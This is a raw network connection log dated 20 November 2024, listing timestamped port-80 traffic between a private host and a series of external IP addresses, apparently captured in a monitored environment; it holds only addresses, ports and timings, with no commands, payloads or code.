Nov 20, 2024 04:19:02.980220079 CET	80	64585	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:02.980329990 CET	64585	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:19:02.980372906 CET	64585	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:19:04.048366070 CET	64585	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:19:05.066824913 CET	64606	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:19:05.073503017 CET	80	64606	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:05.073573112 CET	64606	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:19:05.088510990 CET	64606	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:19:05.093442917 CET	80	64606	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:05.093501091 CET	80	64606	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:05.093513966 CET	80	64606	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:05.093524933 CET	80	64606	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:05.093566895 CET	80	64606	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:05.093578100 CET	80	64606	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:05.093589067 CET	80	64606	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:05.093601942 CET	80	64606	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:05.093612909 CET	80	64606	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:05.536364079 CET	80	64606	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:05.536421061 CET	80	64606	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:05.536456108 CET	80	64606	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:05.536505938 CET	64606	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:19:05.536505938 CET	64606	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:19:06.595228910 CET	64606	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:19:07.615392923 CET	64622	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:19:07.620373011 CET	80	64622	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:07.620693922 CET	64622	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:19:07.638355017 CET	64622	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:19:07.643434048 CET	80	64622	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:08.084657907 CET	80	64622	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:08.084717989 CET	80	64622	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:08.084748983 CET	80	64622	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:08.084860086 CET	64622	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:19:08.084939003 CET	64622	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:19:08.088982105 CET	64622	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:19:08.093904018 CET	80	64622	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:13.163425922 CET	64658	80	192.168.2.4	13.248.169.48
Nov 20, 2024 04:19:13.168329000 CET	80	64658	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:13.168433905 CET	64658	80	192.168.2.4	13.248.169.48
Nov 20, 2024 04:19:13.185730934 CET	64658	80	192.168.2.4	13.248.169.48
Nov 20, 2024 04:19:13.190674067 CET	80	64658	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:13.642158031 CET	80	64658	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:13.642353058 CET	64658	80	192.168.2.4	13.248.169.48
Nov 20, 2024 04:19:14.688983917 CET	64658	80	192.168.2.4	13.248.169.48
Nov 20, 2024 04:19:14.693959951 CET	80	64658	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:15.709181070 CET	64676	80	192.168.2.4	13.248.169.48
Nov 20, 2024 04:19:15.714268923 CET	80	64676	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:15.717132092 CET	64676	80	192.168.2.4	13.248.169.48
Nov 20, 2024 04:19:15.732769012 CET	64676	80	192.168.2.4	13.248.169.48
Nov 20, 2024 04:19:15.737751007 CET	80	64676	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:16.198187113 CET	80	64676	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:16.198257923 CET	64676	80	192.168.2.4	13.248.169.48
Nov 20, 2024 04:19:17.235817909 CET	64676	80	192.168.2.4	13.248.169.48
Nov 20, 2024 04:19:17.240811110 CET	80	64676	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:18.255661964 CET	64691	80	192.168.2.4	13.248.169.48
Nov 20, 2024 04:19:18.260740042 CET	80	64691	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:18.260874033 CET	64691	80	192.168.2.4	13.248.169.48
Nov 20, 2024 04:19:18.273963928 CET	64691	80	192.168.2.4	13.248.169.48
Nov 20, 2024 04:19:18.279047966 CET	80	64691	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:18.279082060 CET	80	64691	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:18.279184103 CET	80	64691	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:18.279211998 CET	80	64691	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:18.279238939 CET	80	64691	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:18.279264927 CET	80	64691	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:18.279290915 CET	80	64691	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:18.279340029 CET	80	64691	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:18.279371023 CET	80	64691	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:18.719897032 CET	80	64691	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:18.720115900 CET	64691	80	192.168.2.4	13.248.169.48
Nov 20, 2024 04:19:19.782741070 CET	64691	80	192.168.2.4	13.248.169.48
Nov 20, 2024 04:19:19.787693024 CET	80	64691	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:20.802273989 CET	64708	80	192.168.2.4	13.248.169.48
Nov 20, 2024 04:19:20.807281017 CET	80	64708	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:20.807370901 CET	64708	80	192.168.2.4	13.248.169.48
Nov 20, 2024 04:19:20.817015886 CET	64708	80	192.168.2.4	13.248.169.48
Nov 20, 2024 04:19:20.824522018 CET	80	64708	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:21.271946907 CET	80	64708	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:21.272072077 CET	80	64708	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:21.272326946 CET	64708	80	192.168.2.4	13.248.169.48
Nov 20, 2024 04:19:21.274415970 CET	64708	80	192.168.2.4	13.248.169.48
Nov 20, 2024 04:19:21.279342890 CET	80	64708	13.248.169.48	192.168.2.4
Nov 20, 2024 04:19:26.399251938 CET	64739	80	192.168.2.4	91.206.201.136
Nov 20, 2024 04:19:26.404227972 CET	80	64739	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:26.404299974 CET	64739	80	192.168.2.4	91.206.201.136
Nov 20, 2024 04:19:26.417035103 CET	64739	80	192.168.2.4	91.206.201.136
Nov 20, 2024 04:19:26.421956062 CET	80	64739	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:27.111341953 CET	80	64739	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:27.111381054 CET	80	64739	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:27.111490011 CET	64739	80	192.168.2.4	91.206.201.136
Nov 20, 2024 04:19:27.923335075 CET	64739	80	192.168.2.4	91.206.201.136
Nov 20, 2024 04:19:28.942112923 CET	64752	80	192.168.2.4	91.206.201.136
Nov 20, 2024 04:19:28.947252989 CET	80	64752	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:28.949136019 CET	64752	80	192.168.2.4	91.206.201.136
Nov 20, 2024 04:19:28.961478949 CET	64752	80	192.168.2.4	91.206.201.136
Nov 20, 2024 04:19:28.966382027 CET	80	64752	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:29.666461945 CET	80	64752	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:29.666584015 CET	80	64752	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:29.666666985 CET	64752	80	192.168.2.4	91.206.201.136
Nov 20, 2024 04:19:30.470238924 CET	64752	80	192.168.2.4	91.206.201.136
Nov 20, 2024 04:19:31.488506079 CET	64771	80	192.168.2.4	91.206.201.136
Nov 20, 2024 04:19:31.493561983 CET	80	64771	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:31.493700981 CET	64771	80	192.168.2.4	91.206.201.136
Nov 20, 2024 04:19:31.505898952 CET	64771	80	192.168.2.4	91.206.201.136
Nov 20, 2024 04:19:31.510879040 CET	80	64771	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:31.510904074 CET	80	64771	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:31.510916948 CET	80	64771	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:31.510929108 CET	80	64771	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:31.510945082 CET	80	64771	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:31.510957003 CET	80	64771	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:31.511111975 CET	80	64771	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:31.511125088 CET	80	64771	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:31.511137009 CET	80	64771	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:32.197645903 CET	80	64771	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:32.197732925 CET	80	64771	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:32.197784901 CET	64771	80	192.168.2.4	91.206.201.136
Nov 20, 2024 04:19:33.017107964 CET	64771	80	192.168.2.4	91.206.201.136
Nov 20, 2024 04:19:34.037072897 CET	64789	80	192.168.2.4	91.206.201.136
Nov 20, 2024 04:19:34.042057991 CET	80	64789	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:34.042162895 CET	64789	80	192.168.2.4	91.206.201.136
Nov 20, 2024 04:19:34.049609900 CET	64789	80	192.168.2.4	91.206.201.136
Nov 20, 2024 04:19:34.054505110 CET	80	64789	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:34.744930029 CET	80	64789	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:34.744966984 CET	80	64789	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:34.745114088 CET	64789	80	192.168.2.4	91.206.201.136
Nov 20, 2024 04:19:34.748868942 CET	64789	80	192.168.2.4	91.206.201.136
Nov 20, 2024 04:19:34.753753901 CET	80	64789	91.206.201.136	192.168.2.4
Nov 20, 2024 04:19:40.108617067 CET	64827	80	192.168.2.4	38.47.232.202
Nov 20, 2024 04:19:40.113872051 CET	80	64827	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:40.114327908 CET	64827	80	192.168.2.4	38.47.232.202
Nov 20, 2024 04:19:40.319245100 CET	64827	80	192.168.2.4	38.47.232.202
Nov 20, 2024 04:19:40.324438095 CET	80	64827	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:41.027597904 CET	80	64827	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:41.027643919 CET	80	64827	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:41.027889967 CET	64827	80	192.168.2.4	38.47.232.202
Nov 20, 2024 04:19:41.830771923 CET	64827	80	192.168.2.4	38.47.232.202
Nov 20, 2024 04:19:42.851586103 CET	64837	80	192.168.2.4	38.47.232.202
Nov 20, 2024 04:19:42.858884096 CET	80	64837	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:42.859510899 CET	64837	80	192.168.2.4	38.47.232.202
Nov 20, 2024 04:19:42.881886959 CET	64837	80	192.168.2.4	38.47.232.202
Nov 20, 2024 04:19:42.889123917 CET	80	64837	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:43.774146080 CET	80	64837	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:43.774203062 CET	80	64837	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:43.774440050 CET	64837	80	192.168.2.4	38.47.232.202
Nov 20, 2024 04:19:44.392148018 CET	64837	80	192.168.2.4	38.47.232.202
Nov 20, 2024 04:19:45.412012100 CET	64838	80	192.168.2.4	38.47.232.202
Nov 20, 2024 04:19:45.417151928 CET	80	64838	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:45.417344093 CET	64838	80	192.168.2.4	38.47.232.202
Nov 20, 2024 04:19:45.438606024 CET	64838	80	192.168.2.4	38.47.232.202
Nov 20, 2024 04:19:45.443622112 CET	80	64838	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:45.443727016 CET	80	64838	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:45.443782091 CET	80	64838	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:45.443810940 CET	80	64838	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:45.443840027 CET	80	64838	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:45.443869114 CET	80	64838	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:45.443896055 CET	80	64838	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:45.443973064 CET	80	64838	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:45.444003105 CET	80	64838	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:46.336446047 CET	80	64838	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:46.336505890 CET	80	64838	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:46.336782932 CET	64838	80	192.168.2.4	38.47.232.202
Nov 20, 2024 04:19:46.954894066 CET	64838	80	192.168.2.4	38.47.232.202
Nov 20, 2024 04:19:47.976351976 CET	64839	80	192.168.2.4	38.47.232.202
Nov 20, 2024 04:19:47.981460094 CET	80	64839	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:47.981565952 CET	64839	80	192.168.2.4	38.47.232.202
Nov 20, 2024 04:19:47.998080969 CET	64839	80	192.168.2.4	38.47.232.202
Nov 20, 2024 04:19:48.003156900 CET	80	64839	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:48.873739958 CET	80	64839	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:48.873799086 CET	80	64839	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:48.873959064 CET	64839	80	192.168.2.4	38.47.232.202
Nov 20, 2024 04:19:48.894314051 CET	64839	80	192.168.2.4	38.47.232.202
Nov 20, 2024 04:19:48.899334908 CET	80	64839	38.47.232.202	192.168.2.4
Nov 20, 2024 04:19:53.942426920 CET	64840	80	192.168.2.4	130.185.109.77
Nov 20, 2024 04:19:53.947386026 CET	80	64840	130.185.109.77	192.168.2.4
Nov 20, 2024 04:19:53.951421976 CET	64840	80	192.168.2.4	130.185.109.77
Nov 20, 2024 04:19:53.972376108 CET	64840	80	192.168.2.4	130.185.109.77
Nov 20, 2024 04:19:53.977235079 CET	80	64840	130.185.109.77	192.168.2.4
Nov 20, 2024 04:19:54.575489044 CET	80	64840	130.185.109.77	192.168.2.4
Nov 20, 2024 04:19:54.575546980 CET	80	64840	130.185.109.77	192.168.2.4
Nov 20, 2024 04:19:54.575664997 CET	64840	80	192.168.2.4	130.185.109.77
Nov 20, 2024 04:19:55.485888958 CET	64840	80	192.168.2.4	130.185.109.77
Nov 20, 2024 04:19:56.505783081 CET	64841	80	192.168.2.4	130.185.109.77
Nov 20, 2024 04:19:56.510843992 CET	80	64841	130.185.109.77	192.168.2.4
Nov 20, 2024 04:19:56.510957956 CET	64841	80	192.168.2.4	130.185.109.77
Nov 20, 2024 04:19:56.529366970 CET	64841	80	192.168.2.4	130.185.109.77
Nov 20, 2024 04:19:56.534442902 CET	80	64841	130.185.109.77	192.168.2.4
Nov 20, 2024 04:19:57.160334110 CET	80	64841	130.185.109.77	192.168.2.4
Nov 20, 2024 04:19:57.160392046 CET	80	64841	130.185.109.77	192.168.2.4
Nov 20, 2024 04:19:57.160446882 CET	64841	80	192.168.2.4	130.185.109.77
Nov 20, 2024 04:19:58.032766104 CET	64841	80	192.168.2.4	130.185.109.77
Nov 20, 2024 04:19:59.054452896 CET	64842	80	192.168.2.4	130.185.109.77
Nov 20, 2024 04:19:59.059639931 CET	80	64842	130.185.109.77	192.168.2.4
Nov 20, 2024 04:19:59.059730053 CET	64842	80	192.168.2.4	130.185.109.77
Nov 20, 2024 04:19:59.082127094 CET	64842	80	192.168.2.4	130.185.109.77
Nov 20, 2024 04:19:59.087174892 CET	80	64842	130.185.109.77	192.168.2.4
Nov 20, 2024 04:19:59.087205887 CET	80	64842	130.185.109.77	192.168.2.4
Nov 20, 2024 04:19:59.087219000 CET	80	64842	130.185.109.77	192.168.2.4
Nov 20, 2024 04:19:59.087343931 CET	80	64842	130.185.109.77	192.168.2.4
Nov 20, 2024 04:19:59.087357044 CET	80	64842	130.185.109.77	192.168.2.4
Nov 20, 2024 04:19:59.087451935 CET	80	64842	130.185.109.77	192.168.2.4
Nov 20, 2024 04:19:59.087481976 CET	80	64842	130.185.109.77	192.168.2.4
Nov 20, 2024 04:19:59.087493896 CET	80	64842	130.185.109.77	192.168.2.4
Nov 20, 2024 04:19:59.087517023 CET	80	64842	130.185.109.77	192.168.2.4
Nov 20, 2024 04:19:59.688496113 CET	80	64842	130.185.109.77	192.168.2.4
Nov 20, 2024 04:19:59.688548088 CET	80	64842	130.185.109.77	192.168.2.4
Nov 20, 2024 04:19:59.688625097 CET	64842	80	192.168.2.4	130.185.109.77
Nov 20, 2024 04:20:00.595514059 CET	64842	80	192.168.2.4	130.185.109.77
Nov 20, 2024 04:20:01.619334936 CET	64843	80	192.168.2.4	130.185.109.77
Nov 20, 2024 04:20:01.624429941 CET	80	64843	130.185.109.77	192.168.2.4
Nov 20, 2024 04:20:01.624507904 CET	64843	80	192.168.2.4	130.185.109.77
Nov 20, 2024 04:20:01.639405966 CET	64843	80	192.168.2.4	130.185.109.77
Nov 20, 2024 04:20:01.644380093 CET	80	64843	130.185.109.77	192.168.2.4
Nov 20, 2024 04:20:02.240964890 CET	80	64843	130.185.109.77	192.168.2.4
Nov 20, 2024 04:20:02.241019964 CET	80	64843	130.185.109.77	192.168.2.4
Nov 20, 2024 04:20:02.241621971 CET	64843	80	192.168.2.4	130.185.109.77
Nov 20, 2024 04:20:02.245214939 CET	64843	80	192.168.2.4	130.185.109.77
Nov 20, 2024 04:20:02.250467062 CET	80	64843	130.185.109.77	192.168.2.4
Nov 20, 2024 04:20:07.297360897 CET	64844	80	192.168.2.4	108.181.189.7
Nov 20, 2024 04:20:07.302350998 CET	80	64844	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:07.302450895 CET	64844	80	192.168.2.4	108.181.189.7
Nov 20, 2024 04:20:07.319495916 CET	64844	80	192.168.2.4	108.181.189.7
Nov 20, 2024 04:20:07.324469090 CET	80	64844	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:08.337418079 CET	80	64844	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:08.337615967 CET	80	64844	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:08.337651968 CET	80	64844	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:08.337718964 CET	64844	80	192.168.2.4	108.181.189.7
Nov 20, 2024 04:20:08.337798119 CET	64844	80	192.168.2.4	108.181.189.7
Nov 20, 2024 04:20:08.833132029 CET	64844	80	192.168.2.4	108.181.189.7
Nov 20, 2024 04:20:09.849442959 CET	64845	80	192.168.2.4	108.181.189.7
Nov 20, 2024 04:20:09.854496002 CET	80	64845	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:09.854578018 CET	64845	80	192.168.2.4	108.181.189.7
Nov 20, 2024 04:20:09.879631042 CET	64845	80	192.168.2.4	108.181.189.7
Nov 20, 2024 04:20:09.884640932 CET	80	64845	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:10.531287909 CET	80	64845	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:10.531358004 CET	80	64845	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:10.531471968 CET	64845	80	192.168.2.4	108.181.189.7
Nov 20, 2024 04:20:11.392092943 CET	64845	80	192.168.2.4	108.181.189.7
Nov 20, 2024 04:20:12.411381006 CET	64846	80	192.168.2.4	108.181.189.7
Nov 20, 2024 04:20:12.416450024 CET	80	64846	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:12.416609049 CET	64846	80	192.168.2.4	108.181.189.7
Nov 20, 2024 04:20:12.433161974 CET	64846	80	192.168.2.4	108.181.189.7
Nov 20, 2024 04:20:12.438335896 CET	80	64846	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:12.438350916 CET	80	64846	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:12.438366890 CET	80	64846	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:12.438410044 CET	80	64846	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:12.438422918 CET	80	64846	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:12.438450098 CET	80	64846	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:12.438463926 CET	80	64846	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:12.438478947 CET	80	64846	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:12.438492060 CET	80	64846	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:12.965291977 CET	80	64846	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:12.965357065 CET	80	64846	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:12.965395927 CET	80	64846	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:12.969191074 CET	64846	80	192.168.2.4	108.181.189.7
Nov 20, 2024 04:20:13.938966990 CET	64846	80	192.168.2.4	108.181.189.7
Nov 20, 2024 04:20:14.957202911 CET	64847	80	192.168.2.4	108.181.189.7
Nov 20, 2024 04:20:14.962459087 CET	80	64847	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:14.965226889 CET	64847	80	192.168.2.4	108.181.189.7
Nov 20, 2024 04:20:14.972754002 CET	64847	80	192.168.2.4	108.181.189.7
Nov 20, 2024 04:20:14.977706909 CET	80	64847	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:15.808782101 CET	80	64847	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:15.808825970 CET	80	64847	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:15.808912039 CET	64847	80	192.168.2.4	108.181.189.7
Nov 20, 2024 04:20:15.808975935 CET	80	64847	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:15.809025049 CET	64847	80	192.168.2.4	108.181.189.7
Nov 20, 2024 04:20:15.811597109 CET	64847	80	192.168.2.4	108.181.189.7
Nov 20, 2024 04:20:15.816535950 CET	80	64847	108.181.189.7	192.168.2.4
Nov 20, 2024 04:20:20.891357899 CET	64848	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:20.896373987 CET	80	64848	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:20.899327040 CET	64848	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:20.911335945 CET	64848	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:20.916307926 CET	80	64848	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:21.499918938 CET	80	64848	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:21.499964952 CET	80	64848	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:21.500003099 CET	80	64848	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:21.500025034 CET	64848	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:21.500058889 CET	80	64848	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:21.500093937 CET	80	64848	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:21.500111103 CET	64848	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:21.500129938 CET	80	64848	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:21.500164032 CET	80	64848	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:21.500181913 CET	64848	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:21.500194073 CET	80	64848	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:21.500228882 CET	80	64848	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:21.500250101 CET	64848	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:21.500263929 CET	80	64848	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:21.500323057 CET	64848	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:21.505523920 CET	80	64848	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:21.505558968 CET	80	64848	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:21.505594969 CET	80	64848	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:21.505609989 CET	64848	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:21.548306942 CET	64848	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:21.587637901 CET	80	64848	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:21.587677002 CET	80	64848	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:21.587714911 CET	80	64848	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:21.587738037 CET	64848	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:21.587781906 CET	64848	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:22.425128937 CET	64848	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:23.443589926 CET	64849	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:23.448761940 CET	80	64849	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:23.448838949 CET	64849	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:23.465034008 CET	64849	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:23.470005035 CET	80	64849	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:24.057552099 CET	80	64849	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:24.057590008 CET	80	64849	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:24.057625055 CET	80	64849	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:24.057657957 CET	80	64849	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:24.057689905 CET	80	64849	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:24.057723999 CET	80	64849	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:24.057755947 CET	80	64849	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:24.057790995 CET	80	64849	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:24.057816982 CET	64849	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:24.057822943 CET	80	64849	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:24.057859898 CET	80	64849	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:24.057919979 CET	64849	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:24.057919979 CET	64849	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:24.061129093 CET	64849	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:24.062935114 CET	80	64849	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:24.062968969 CET	80	64849	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:24.063004017 CET	80	64849	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:24.063038111 CET	80	64849	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:24.065124989 CET	64849	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:24.146209002 CET	80	64849	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:24.146243095 CET	80	64849	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:24.146281004 CET	80	64849	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:24.149133921 CET	64849	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:24.973134041 CET	64849	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:25.988915920 CET	64850	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:25.994129896 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:25.994219065 CET	64850	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:26.008686066 CET	64850	80	192.168.2.4	203.161.42.73
Nov 20, 2024 04:20:26.013868093 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.013900995 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.013928890 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.013957024 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.014008999 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.014035940 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.014062881 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.014091015 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.014118910 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.665014029 CET	80	64850	203.161.42.73	192.168.2.4
Nov 20, 2024 04:20:26.665061951 CET	80	64850	203.161.42.73	192.168.2.4
